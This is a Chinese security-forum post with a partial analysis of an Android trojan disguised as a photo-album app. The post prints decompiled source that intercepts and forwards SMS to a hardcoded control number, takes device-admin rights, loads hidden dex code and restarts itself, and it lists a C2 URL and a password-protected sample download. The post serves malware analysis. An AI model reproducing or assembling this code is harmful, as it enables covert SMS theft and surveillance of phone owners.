一枚APK文件的分析【半成品】

Sp4ce · 发表于 2014-10-28 00:13

本帖最后由轩少于 2014-10-28 22:42 编辑

昨天从QQ群里截获的一个APK样本，看了下索取的权限，都是高危权限，不排除有窃取隐私的可能。
文件采用“包中包”（就是在一个APK中再放置另一个APK。比如这个：cao.apk在：同城约炮相册\res\raw目录下，安装完同城约炮相册.apk，运行后自动安装cao.apk）安装
文件信息：
同城约炮相册.apk
CRC32: DFFE6DBE
MD5: 4F487D6D264F6FE9915D7FAEEC6327D0
SHA-1: ACC64922E63F978F689EC8E87A76CF6855CA6D00

cao.apk
CRC32: 00AF413F
MD5: 325666F55D02C48725E3EBC5613226F9
SHA-1: 4701C5857E6CA205DEEFF4F9A41B50D2CEEB5438

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

<?xml version="1.0" encoding="utf-8"?>
<manifest
        xmlns:android="http://schemas.android.com/apk/res/android"
        android:versionCode="2"
        android:versionName="2.0"
        package="sdgfdg.wtert.sdgsfgbxbcvdfh"
        >
        <uses-sdk
                android:minSdkVersion="8"
                android:targetSdkVersion="20"
                android:name="android.permission.INTERNET"//访问网络
                android:name="android.permission.SEND_SMS" //发送短信
                android:name="android.permission.RECEIVE_SMS"//接收短信
                android:name="android.permission.READ_SMS"//读取短信
                android:name="android.permission.WRITE_SMS" //编写短信
                android:name="android.permission.WRITE_EXTERNAL_STORAGE"//操作外部存储文件
                android:name="android.permission.KILL_BACKGROUND_PROCESSES"//结束（杀掉）指定进程
                android:theme="@android:01030007"
                android:label="@7F060001"
                android:icon="@7F020000"
                android:debuggable="true"
                android:allowBackup="true"
                >
                <activity
                        android:label="@7F060001"
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MainActivity"
                        >
                        <intent-filter
                                >
                                <action
                                        android:name="android.intent.action.MAIN"
                                        >
                                </action>
                                <category
                                        android:name="android.intent.category.LAUNCHER"
                                        >
                                </category>
                        </intent-filter>
                </activity>
                <service
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MyServers1"//执行MyServers1.class
                        >
                </service>
                <receiver
                        android:label="请激活"
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.DevicesReceiver2"  //执行DevicesReceiver2.class
                        android:permission="android.permission.BIND_DEVICE_ADMIN"  //[color=#000][font=Arial]请求系统管理员接收者[/font][/color][color=#000][font=Helvetica]receiver[/font][/color]
                        android:description="@7F060003"
                        >
                        <meta-data
                                android:name="android.app.device_admin"
                                android:resource="@7F040000"
                                >
                        </meta-data>
                        <intent-filter
                                >
                                <action
                                        android:name="android.app.action.DEVICE_ADMIN_ENABLED"//打开设备管理器
                                        >
                                </action>
                        </intent-filter>
                </receiver>
                <receiver
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.laixinxis"//执行laixinxis.class
                        >
                        <intent-filter
                                android:priority="2147483647"
                                >
                                <action
                                        android:name="android.provider.Telephony.SMS_RECEIVED"//拦截系统收到信息广播（就是通知栏）
                                        >
                                </action>
                                <category
                                        android:name="android.intent.category.DEFAULT"//隐藏启动？
                                        >
                                </category>
                        </intent-filter>
                </receiver>
        </application>
</manifest>

查看AndroidManifest.xml配置文件，可以发现赋予了程序非常多的权限，且是高危的权限，例如发送短信、结束程序、拦截广播等等，
DevicesReceiver2.class代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.app.admin.DeviceAdminReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.res.Resources;
 
public class DevicesReceiver2 extends DeviceAdminReceiver
{
  ComponentName componentName;
  PackageManager packageManager;
 
  public void onDisabled(Context paramContext, Intent paramIntent)
  {
    super.onDisabled(paramContext, paramIntent);
  }
 
  public void onEnabled(Context paramContext, Intent paramIntent)
  {
    super.onEnabled(paramContext, paramIntent);
  }
 
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_ENABLED"))
      ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099659));
    while (true)
    {
      super.onReceive(paramContext, paramIntent);
      return;
      if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"))
        ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099660));
    }
  }
}

发现调取了一个 huanaidss2.controlphone 我们接着看 huanaidss2.class

[AppleScript] 纯文本查看 复制代码

1

2

3

4

5

6

7

package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
public class huanaidss2
{
  public static final String baidu = "http://60.8.229.158:8002/sj.asp";
  public static String controlphone = "15021352759";
}

得到： controlphone = "15021352759" 也就是说会给15021352759发短信，顺手搜了下手机号，呵呵呵。。

shouxinxi.class代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.database.ContentObserver;
import android.net.Uri;
import android.os.Handler;
 
public class shouxinxi extends ContentObserver
{
  public SharedPreferences abSharedPreferences = null;
  private Context context;
  public SharedPreferences.Editor editor;
  private Uri inbox = null;
  private String status;
 
  public shouxinxi(Context paramContext, Handler paramHandler)
  {
    super(paramHandler);
    this.context = paramContext;
    this.inbox = Uri.parse("content://sms/inbox");
    Change();
  }
 
  public void Change()
  {
    this.abSharedPreferences = this.context.getSharedPreferences("data", 0);
    this.status = this.abSharedPreferences.getString("isWorkServer", "0");
    ApksUtil1.shanxx(this.context, this.context.getResources().getString(2131099666), this.context.getResources().getString(2131099669),
huanaidss2.controlphone, this.status, this.inbox, this.abSharedPreferences);//调用shanxx.class和huanaidss2.class
  }
 
  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    this.inbox = Uri.parse("content://sms/inbox");
    Change();
  }
}

laixinxis.class的代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;
 
public class laixinxis extends BroadcastReceiver
{
  public SharedPreferences abSharedPreferences = null;
  public SharedPreferences.Editor editor;
  private String messageStr;
  private int n;
  private String phoneStr;
  private shouxinxi shouxxba;
  private String status;
  private SmsMessage[] xinxi;
 
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    this.abSharedPreferences = paramContext.getSharedPreferences("data", 0);
    this.status = this.abSharedPreferences.getString("isWorkServer", "0");
    Log.i("action", paramIntent.getAction());
    paramContext.getSharedPreferences("config", 0);
    Object[] arrayOfObject;
    if (paramIntent.getAction().equals(paramContext.getResources().getString(2131099655)))
    {
      arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
      this.xinxi = new SmsMessage[arrayOfObject.length];
      this.n = 0;
      if (this.n < arrayOfObject.length);
    }
    else
    {
      return;
    }
    this.xinxi[this.n] = SmsMessage.createFromPdu((byte[])arrayOfObject[this.n]);
    this.phoneStr = this.xinxi[this.n].getOriginatingAddress();
    this.messageStr = this.xinxi[this.n].getMessageBody();
    if (this.status.equals("1"))
    {
      ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
      if (this.messageStr.contains("close"))
      {
        ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099653));
        this.editor = this.abSharedPreferences.edit();
        this.editor.putString("isWorkServer", "0");
        this.editor.commit();
      }
    }
    while (true)
    {
      this.n = (1 + this.n);
      break;
      if (this.messageStr.contains("open"))
      {
        ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
        this.editor = this.abSharedPreferences.edit();
        this.editor.putString("isWorkServer", "1");
        this.editor.commit();
        this.shouxxba = new shouxinxi(paramContext, null);
        paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
      }
      else
      {
        ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, this.phoneStr + "<" + this.messageStr);
        continue;
        if (this.messageStr.contains("open"))
        {
          ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
          ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
          this.editor = this.abSharedPreferences.edit();
          this.editor.putString("isWorkServer", "1");
          this.editor.commit();
          this.shouxxba = new shouxinxi(paramContext, null);
          paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
        }
      }
    }
  }
 
  void pingbi(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver)
  {
    ApksUtil1.pinbi(paramContext, paramString1, paramString2, paramBroadcastReceiver);
  }
 
  public native void pingbiJNI(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver);
}

被调用的shanxx代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

  public static void shanxx(Context paramContext, String paramString1, String paramString2, String paramString3, String paramString4, Uri paramUri, SharedPreferences paramSharedPreferences)
  {
    File localFile = paramContext.getDir("dex", 0);
    DexClassLoader localDexClassLoader = new DexClassLoader(AbFilesUtil1.path.getAbsolutePath() + AbFilesUtil1.Filepath, localFile.getAbsolutePath(), null, paramContext.getClassLoader());
    try
    {
      Class localClass = localDexClassLoader.loadClass(paramString1);
      Object localObject = localClass.newInstance();
      Method localMethod = localClass.getMethod(paramString2, new Class[] { Context.class, String.class, String.class, Uri.class, SharedPreferences.class });
      localMethod.setAccessible(true);
      localMethod.invoke(localObject, new Object[] { paramContext, paramString3, paramString4, paramUri, paramSharedPreferences });
      return;
    }
    catch (Exception localException)
    {
      localException.printStackTrace();
    }
  }
}

MyServes1.class的代码如下（调用了上述几个class）：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.app.Service;
import android.content.ContentResolver;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.SharedPreferences;
import android.content.res.Resources;
import android.net.Uri;
import android.os.IBinder;
 
public class MyServers1 extends Service
{
  public static final Uri xxdizhi = Uri.parse("content://sms/");
  public SharedPreferences abSharedPreferences = null;
  private laixinxis xinxilai;
  private shouxinxi xxshou;
 
  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }
 
  public void onCreate()
  {
    super.onCreate();
    this.abSharedPreferences = getSharedPreferences("data", 0);
    this.xxshou = new shouxinxi(this, null);
    getContentResolver().registerContentObserver(xxdizhi, true, this.xxshou);
    IntentFilter localIntentFilter = new IntentFilter();
    localIntentFilter.addAction(getResources().getString(2131099655));
    localIntentFilter.setPriority(2147483647);
    this.xinxilai = new laixinxis();
    registerReceiver(this.xinxilai, localIntentFilter, getResources().getString(2131099655), null);
  }
 
  public void onDestroy()
  {
    super.onDestroy();
    stopForeground(true);
    unregisterReceiver(this.xinxilai);
    getContentResolver().unregisterContentObserver(this.xxshou);
    Intent localIntent = new Intent();
    localIntent.setClass(this, MyServers1.class);
    startService(localIntent);
  }
}

由于能力有限，我也只能搞到这里了，下面这是样本，有能力的继续搞吧……调用函数太多，密码：52pojie

同城约炮相册.rar (52.07 KB, 下载次数: 100)

Hmily · 发表于 2014-11-21 19:25

不错啊，开始搞安卓分析了？@willJ

rockymax · 发表于 2014-12-13 22:08

不错，研究一下呢

B6B6B6 · 发表于 2014-11-21 23:49

顶帖！！！！

爱不灭 · 发表于 2014-12-20 10:14

研究一下

Sp4ce · 发表于 2015-2-9 02:19

过几天再看下，最近没空，累如狗

武川烁 · 发表于 2015-2-10 09:51

你这文件名。。。

星期日 · 发表于 2015-3-20 23:49

我也在研究这款软件！楼主怎么那么久没有更新啦？

15732164757 · 发表于 2015-8-6 08:23

知道这个

蚊子169 · 发表于 2016-4-14 17:15

弄好了吗

帐号		自动登录	找回密码
密码			注册[Register]

[移动样本分析] 一枚APK文件的分析【半成品】

免费评分